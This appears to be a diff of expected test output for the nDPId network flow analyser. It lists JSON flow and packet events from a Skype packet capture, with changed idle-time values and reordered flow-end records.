00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3236,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1431969794907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969794907,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ITcAAEAR1gjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3239,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1431969796001,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969796001,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6focAAEAReLjAqAEiwKgBAdpVADUAJgS+DhkBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 
-00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969658376,"flow_last_seen":1431969684569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969687310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969664990,"flow_last_seen":1431969683864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50045,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969667019,"flow_last_seen":1431969685356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969669039,"flow_last_seen":1431969688720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969659988,"flow_last_seen":1431969685175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3269,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808100,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969678270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3269,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808100,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 